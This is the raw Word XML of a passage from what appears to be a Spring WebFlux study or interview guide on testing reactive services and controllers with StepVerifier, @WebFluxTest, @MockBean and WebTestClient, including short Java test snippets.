    </w:p>
    <w:p w14:paraId="33E53E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test&lt;/scope&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8F782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7022DC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19A3775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webflux'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2575E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test'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2A0FF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io.projectreactor:reactor-test'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B25A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Write Unit Tests for Reactive Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003E4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ebFluxTest for testing your controller layer and @MockBean to mock dependencies like services or repositories. You can also use @DataMongoTest or @WebFluxTest when working with databases. In most cases, you'll use StepVerifier from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test reactive streams (Mono or Flux).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70EEFAE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ere’s how you can test a </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Reactive Servic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B1C13F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ervice Class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3694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BEA79B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4D1FB4" w14:textId="77777777" w:rsidR="00FC73C1" w:rsidRPr="00B13F85" w:rsidRDefault="00FC73C1" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52C6004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1056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18335E3D" w14:textId="77777777" w:rsidR="00FC73C1" w:rsidRPr="00B13F85" w:rsidRDefault="00FC73C1" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05B2F75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DC7B2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ervice logic (in reality, this might fetch from DB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31214A0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1".equals(id)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652236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Test Item", 100.0));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9B4AC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9084C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mpty();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F42305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454AFA" w14:textId="77777777" w:rsidR="00FC73C1" w:rsidRPr="00B13F85" w:rsidRDefault="00FC73C1" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="525A3C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ADD3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448C59B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 100.0),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5759D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 200.0),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6EF3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 300.0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1488ECA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EAAFF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6D31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04901F"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Controller:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4719CA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436772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72B039B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DA34951" w14:textId="77777777" w:rsidR="00FC73C1" w:rsidRPr="00B13F85" w:rsidRDefault="00FC73C1" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C40A3D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6DA028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49F37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B13ABA8" w14:textId="77777777" w:rsidR="00FC73C1" w:rsidRPr="00B13F85" w:rsidRDefault="00FC73C1" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CAD39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C8C6B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20188FD" w14:textId="77777777" w:rsidR="00FC73C1" w:rsidRPr="00B13F85" w:rsidRDefault="00FC73C1" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FF136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3CBE3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PathVariable String id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE7EA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5F1D3DD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A6A85" w14:textId="77777777" w:rsidR="00FC73C1" w:rsidRPr="00B13F85" w:rsidRDefault="00FC73C1" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="793575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Mapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E827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F4143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35B54D5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64EE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27338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rite Tests for the Service Layer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F0B9B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 Test:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06EB6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109387C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6CD34F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test.StepVerifier;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0974ABE4" w14:textId="77777777" w:rsidR="00FC73C1" w:rsidRPr="00B13F85" w:rsidRDefault="00FC73C1" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BF2EEF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Test {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C763B6" w14:textId="77777777" w:rsidR="00FC73C1" w:rsidRPr="00B13F85" w:rsidRDefault="00FC73C1" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="294904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ItemService itemService = new ItemService();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712B4764" w14:textId="77777777" w:rsidR="00FC73C1" w:rsidRPr="00B13F85" w:rsidRDefault="00FC73C1" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="245ECDE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40DD3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0167C75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1");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0558027F" w14:textId="77777777" w:rsidR="00FC73C1" w:rsidRPr="00B13F85" w:rsidRDefault="00FC73C1" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C646F1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tepVerifier checks the value in the Mono</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5406D07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477DFC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 &amp;&amp; item.getName().equals("Test Item"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D17B9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707FFC1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F6F8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59C30C4" w14:textId="77777777" w:rsidR="00FC73C1" w:rsidRPr="00B13F85" w:rsidRDefault="00FC73C1" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4407954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1F5FE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053D32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unknown");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C26B5D" w14:textId="77777777" w:rsidR="00FC73C1" w:rsidRPr="00B13F85" w:rsidRDefault="00FC73C1" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="189D842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6DE2F2C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688A1B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2B1F42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FEF645C" w14:textId="77777777" w:rsidR="00FC73C1" w:rsidRPr="00B13F85" w:rsidRDefault="00FC73C1" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DEA1D7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979952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AllItems() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385AFB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result = itemService.getAllItems();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15729937" w14:textId="77777777" w:rsidR="00FC73C1" w:rsidRPr="00B13F85" w:rsidRDefault="00FC73C1" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="686C7FC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56F33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1"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361EAF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2"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523E61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3"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3C47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298B18A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583D6BE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6231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1F2801"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the Test:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4E5D7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epVerifier.create()</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Creates a StepVerifier instance from the Mono or Flux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C658E4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NextMatches()</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Asserts the value returned in each element emitted by the reactive stream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F101C0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Complete()</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Verifies that the stream completes without any errors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180FF10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ify()</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ends the test and performs all assertions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369EE4D3"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est the Controller Layer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BD44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You can use @WebFluxTest to test your controller in isolation. This also involves mocking the service layer. In a typical WebFlux controller test, you would use WebTestClient for testing HTTP interactions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF8BD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 Test with WebTestClient:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64825F8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BeforeEach;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7896A45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462C6F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mockito.Mock;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31AE56A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83F90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autoconfigure.webflux.WebFluxTest;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09850EF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mock.mockito.MockBean;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509C23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test.web.reactive.server.WebTestClient;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1103075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C3D10DC" w14:textId="77777777" w:rsidR="00FC73C1" w:rsidRPr="00B13F85" w:rsidRDefault="00FC73C1" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DBC9E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static org.mockito.Mockito.when;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181DCCF2" w14:textId="77777777" w:rsidR="00FC73C1" w:rsidRPr="00B13F85" w:rsidRDefault="00FC73C1" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A4C269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667093E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07E67E67" w14:textId="77777777" w:rsidR="00FC73C1" w:rsidRPr="00B13F85" w:rsidRDefault="00FC73C1" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="308BF0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94BDC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7C4240A1" w14:textId="77777777" w:rsidR="00FC73C1" w:rsidRPr="00B13F85" w:rsidRDefault="00FC73C1" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14B6548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31D68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0EEC026F" w14:textId="77777777" w:rsidR="00FC73C1" w:rsidRPr="00B13F85" w:rsidRDefault="00FC73C1" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F26101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42447CA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586DF56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ock the service layer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6BF36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01660D8B" w14:textId="77777777" w:rsidR="00FC73C1" w:rsidRPr="00B13F85" w:rsidRDefault="00FC73C1" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43222D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the actual GET request using WebTestClient</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113523E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3EAE7B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6C00FC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1293EF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3660AFF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64B7F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96F08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3A9476D" w14:textId="77777777" w:rsidR="00FC73C1" w:rsidRPr="00B13F85" w:rsidRDefault="00FC73C1" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1025C7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145FE46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3DCB2F4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unknown")).thenReturn(Mono.empty());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E145B4" w14:textId="77777777" w:rsidR="00FC73C1" w:rsidRPr="00B13F85" w:rsidRDefault="00FC73C1" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B3BE9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unknown")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4487136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0D00541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NotFound();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A627D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152E26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3C57DD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Controller Test:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7864F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A client to simulate HTTP requests for testing WebFlux controllers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C6076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Bean</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Used to mock beans in the application context, like the service layer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1316288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sonPath()</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Used to verify specific fields in the returned JSON response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541D621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Handling Errors in Reactive Streams</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0647E1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rror handling in reactive streams, you can test if your service is correctly handling errors, such as validation or database connection errors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9AE0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of testing error handling:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6695EC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20ABE88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ErrorHandling() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0500A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Mono&lt;Item&gt; result = itemService.getItemById("invalid");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F7C112" w14:textId="77777777" w:rsidR="00FC73C1" w:rsidRPr="00B13F85" w:rsidRDefault="00FC73C1" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BB6894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04BE774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Error(ItemNotFoundException.class)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F21DD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6F3B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528BF5"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FD023E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using Mono and Flux along with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verify the behavior of reactive streams. You can use </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>StepVerifier</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to test Mono and Flux in isolation,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xml:space="preserve"> to test the full HTTP interaction of the controllers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFF007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testing both the service and controller layers, you can ensure that your reactive web application behaves as expected under various conditions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE670D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332" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="65835A3E" w14:textId="1370BFA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2" w:name="_Toc197867756"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Which tools or strategies would you use for testing reactive endpoints</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="542"/>
    </w:p>
    <w:p w14:paraId="69815EC1" w14:textId="156F813D" w:rsidR="00215CC0" w:rsidRPr="00B13F85" w:rsidRDefault="00215CC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w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactive endpoint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WebTestClient</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9C876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DBCD23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both synchronous and asynchronous HTTP requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD9023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verify the response status, body, headers, and more.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2336ABF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to test controllers in isolation without needing to start the full application context.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0370984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18E71F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20B72E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TestClient webTestClient;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E783FCD" w14:textId="77777777" w:rsidR="00215CC0" w:rsidRPr="00B13F85" w:rsidRDefault="00215CC0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="563470A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34D317C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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2143137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54E999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53671C2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35AF1BD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9CCF3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66A59B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7A54644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297974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epVerifier (from Reactor Test)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C92CA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2638D5D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llows you to verify the emitted elements in a reactive stream (Mono or Flux).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D6F45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verifying the completion or errors in the stream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60CA67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ps simulate and test how data is emitted asynchronously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFF68D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4650A7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034F70B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19A2FAA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itemMono = itemService.getItemById("1");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C760BDF" w14:textId="77777777" w:rsidR="00215CC0" w:rsidRPr="00B13F85" w:rsidRDefault="00215CC0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77B22D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itemMono)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09893A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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709281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F83826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32FB5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860BB7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ebFluxTest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4203E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C4F8F8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ads only WebFlux-related components, which makes it faster for testing web endpoints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234166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sily mock services or repositories with @MockBean.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFCF1B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controller tests in isolation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D2612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E62D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3E7205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7417C0A" w14:textId="77777777" w:rsidR="00215CC0" w:rsidRPr="00B13F85" w:rsidRDefault="00215CC0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6640602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B58DC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260E2FA4" w14:textId="77777777" w:rsidR="00215CC0" w:rsidRPr="00B13F85" w:rsidRDefault="00215CC0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0946809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70BF1A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E6033AA" w14:textId="77777777" w:rsidR="00215CC0" w:rsidRPr="00B13F85" w:rsidRDefault="00215CC0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BAAF62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8B2C1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2CBF3BB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3F629CF8" w14:textId="77777777" w:rsidR="00215CC0" w:rsidRPr="00B13F85" w:rsidRDefault="00215CC0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="452CA67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5CFC05C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B77044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2FECE9B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2ECF195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5A0B6B0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316D32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DAE40B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0F4F7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MockBean</w:t>
      </w:r>
    </w:p>
